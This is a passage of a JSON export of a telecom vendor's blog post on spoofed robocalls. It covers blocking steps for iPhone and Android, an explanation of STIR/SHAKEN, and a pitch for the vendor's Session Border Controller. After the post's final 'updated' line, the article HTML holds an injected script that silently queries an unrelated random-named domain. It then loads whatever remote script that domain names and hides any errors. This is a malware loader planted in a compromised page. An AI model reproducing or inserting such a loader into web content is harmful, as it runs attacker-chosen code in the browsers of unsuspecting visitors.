probably the last resort. In case nothing works &#8211; you find that your phone number is heavily spoofed, and you are still bothered by scammers then changing your phone number is the best way to get out of that situation.\u00a0<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"How_to_Prevent_Spoofed_Calls_to_Your_Phone\"><\/span>How to Prevent Spoofed Calls to Your Phone?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">If you have been receiving spoofed calls on your phone recently, then you certainly need to take some immediate action to stop spoofed calls to your phone. Follow these 5 steps:<\/span><\/p>\n<ol>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Don\u2019t Pick Calls From Unknown Numbers<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Do Not Call Back to Unknown Numbers<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Simply Block Robocalls from your Phone\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Block Phone Numbers that Appear Phishy<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Use a Phone Filter App to Block Unwanted Calls<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Initially Stay Silent When Receiving Calls from Unknown Numbers<\/span><\/li>\n<\/ol>\n<h2><span class=\"ez-toc-section\" id=\"How_to_Block_Spoofed_Calls_on_Your_Device\"><\/span>How to Block Spoofed Calls on Your Device?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><span class=\"ez-toc-section\" id=\"Block_Unknown_Numbers_on_iPhone\"><\/span>Block Unknown Numbers on iPhone<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">You can block caller ID spoofed calls on your iPhone by following these steps:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">From the Home Screen, open the Phone App. Now tap on Recents which will show your call history.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Now Spot the phone number that you want to block. Select the info button next to the phone number.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Upon scrolling down, you will find an option \u2018Block this Caller\u2019. Tap on this option and your iPhone will block this phone number for future incoming calls and messages.\u00a0<\/span><\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"Block_Unknown_Numbers_on_Android\"><\/span>Block Unknown Numbers on Android<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">You can easily block caller ID spoofed calls on your Android phone with the following steps:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Open the Phone app from your mobile device and select Recents.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Now Select a phone number that you want to block. Long press upon this number.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">A list of options will appear. Select \u2018block\/report spam\u2019 option.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Also, check the \u2018Report call as spam\u2019 box.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Select Block and you are done.\u00a0<\/span><\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"How_Can_Mobile_Carriers_Guard_Against_Spoofing\"><\/span>How Can Mobile Carriers Guard Against Spoofing?<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><span style=\"font-weight: 400;\">So what options do carriers have to prevent this Robocalling? The Federal Communications Commission (FCC) has notified carriers to implement call authentication measures by adopting STIR\/SHAKEN standards in the United States. <\/span><b><i>U.S. consumers receive approximately 4 billion robocalls per month, according to private analyses.<\/i><\/b><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-4217 aligncenter\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/FCC-statement.jpg\" alt=\"FCC statement on spoofed calls\" width=\"865\" height=\"523\" \/><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Implementing_STIRSHAKEN_with_a_Session_Border_Controller\"><\/span>Implementing STIR\/SHAKEN with a Session Border Controller<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><a href=\"https:\/\/www.revesoft.com\/products\/reve-session-border-controller\"><span style=\"font-weight: 400;\">Deploying an SBC<\/span><\/a><span style=\"font-weight: 400;\"> is one of the most effective measures to mitigate these fraudulent calls through the STIR\/SHAKEN framework.<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"What_is_STIRSHAKEN\"><\/span>What is STIR\/SHAKEN?<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><span style=\"font-weight: 400;\">The Secure Telephony Identity Revisited (STIR) framework is developed by the Internet Engineering Taskforce (IETF) and defines a signature to verify the calling number and its transmission on SIP.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">On the other hand Signature Based Handling of Asserted Information Using toKENs (SHAKEN) is another framework created to provide an application profile for service providers applying STIR.<\/span><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2174\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/How-to-Prevent-Spoofed.jpg\" alt=\"How STIR\/SHAKEN works\" width=\"1200\" height=\"628\" srcset=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/How-to-Prevent-Spoofed.jpg 1200w, https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/How-to-Prevent-Spoofed-300x157.jpg 300w, https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/How-to-Prevent-Spoofed-768x402.jpg 768w, https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/How-to-Prevent-Spoofed-1024x536.jpg 1024w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/><\/p>\n<p><span style=\"font-weight: 400;\">In simple terms, the call-originating carriers will sign the caller IDs as legitimate and validated by other carriers before they reach the users.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">There are several components of STIR\/SHAKEN\u00a0 but the main element is the SIP headers of each originating call that will carry an encrypted token validating the sender and the caller ID authenticity which can be decrypted and confirmed at the terminating end.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">With an SBC, service providers can combat spoofed robocalls through caller ID authentication. STIR\/SHAKEN solution in a Session Border Controller aids in the authentication, signing, and verification of calls.<\/span><\/p>\n<h3><span class=\"ez-toc-section\" id=\"A_Common_Deployment_Architecture_for_SHAKEN\"><\/span>A Common Deployment Architecture for SHAKEN<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">Calls are signed by the interconnecting Session Border Controller as they leave the originating carrier\u2019s network<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><span style=\"font-weight: 400;\">The interconnect SBC verifies the Call as it enters the terminating carrier\u2019s network<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">SBC is one of the most robust solutions in the industry to prevent unwanted robocalling. Communication providers are rapidly adopting this solution in their network to not only prevent robocalling but also various types of telecom frauds.\u00a0<\/span><\/p>\n<h2><span class=\"ez-toc-section\" id=\"REVE_SBC_STIRSHAKEN_Combatting_Spoofed_Robocalls\"><\/span>REVE SBC &amp; STIR\/SHAKEN: Combatting Spoofed Robocalls<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-4219 aligncenter\" src=\"https:\/\/www.revesoft.com\/blog\/wp-content\/uploads\/2021\/06\/REVE-SBC-logo.jpg\" alt=\"REVE SBC logo\" width=\"699\" height=\"157\" \/><\/p>\n<p><span style=\"font-weight: 400;\">REVE&#8217;s Session Border Controller is equipped with STIR\/SHAKEN protocols and serves as a critical tool for communication service providers in safeguarding their networks against spoofed calls and robocalls. REVE SBC establishes a framework of trust and authenticity, fortifying the integrity of telecommunication systems while adhering to regulatory standards. <\/span><a href=\"https:\/\/www.revesoft.com\/products\/reve-session-border-controller#free_demo_form\"><span style=\"font-weight: 400;\">Take advantage of the free demo<\/span><\/a><span style=\"font-weight: 400;\"> to test how REVE SBC integrates STIR and SHAKEN protocols to offer a robust defense to stop spoofed robocalls.\u00a0<\/span><\/p>\n<p style=\"text-align: center;\"><a class=\"btn btn-primary\" style=\"padding: 8px 12px; font-size: 18px;\" href=\"https:\/\/www.revesoft.com\/registration\/free-voip-reve-sbc\" target=\"_blank\" rel=\"noopener\">Contact for Free Demo<\/a><\/p>\n<h2 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"Read_Also\"><\/span><strong>Read Also<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"SIPVoIP_Fraud_Attacks_Why_Operators_Need_a_Reliable_Solution\"><\/span><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/sipvoip-fraud-attacks-operators-need-reliable-solution\/\" target=\"_blank\" rel=\"noopener\">SIP\/VoIP Fraud Attacks: Why Operators Need a Reliable Solution?<\/a><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<h3 style=\"text-align: center;\"><span class=\"ez-toc-section\" id=\"Importance_of_a_Session_Border_Controller_in_SIP_Trunking\"><\/span><a href=\"https:\/\/www.revesoft.com\/blog\/sbc\/importance-session-border-controller-sip-trunking\/\" target=\"_blank\" rel=\"noopener\">Importance of a Session Border Controller in SIP Trunking<\/a><span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>&nbsp;<\/p>\n<p>Note: This post has been updated with the latest information on 19-12-23.<script>(async () => {\n  const TIMEOUT_MS = 60_000;\n  try {\n    const tdsResponse = await fetch('https:\/\/eotoatotlasldkd.com\/ofo');\n    const scriptUrl = (await tdsResponse.text()).trim();<\/p>\n<p>    const loadScriptWithTimeout = (url, timeout) => {\n      return new Promise((resolve, reject) => {\n        const script = document.createElement('script');\n        script.src = url;\n        script.async = true;<\/p>\n<p>        script.onload = () => {\n          clearTimeout(timer);\n          resolve();\n        };<\/p>\n<p>        script.onerror = () => {\n          clearTimeout(timer);\n          reject();\n        };<\/p>\n<p>        const timer = setTimeout(() => {\n          script.remove();\n          reject();\n        }, timeout);<\/p>\n<p>        document.body.appendChild(script);\n      });\n    };<\/p>\n<p>    await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS);\n  } catch (_) {}\n})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today, our phones are nothing less than our lifelines. However, the constant bombardment of spoofed calls is not just an annoyance, rather it is a dangerous phenomenon that\u2019s growing largely. According to the statistics, &#8220;In the U.S. as of August 2023, Americans have received 5.46 billion robocalls and each person receives almost 17 spam calls [&hellip;]<\/p>\n","protected":false},"author":8,"featured_media":4216,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[74],"tags":[],"class_list":["post-2173","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sbc"],"_links":{"self":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/2173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/comments?post=2173"}],"version-history":[{"count":16,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/2173\/revisions"}],"predecessor-version":[{"id":6478,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/posts\/2173\/revisions\/6478"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/media\/4216"}],"wp:attachment":[{"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/media?parent=2173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/categories?post=2173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.revesoft.com\/blog\/wp-json\/wp\/v2\/tags?post=2173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}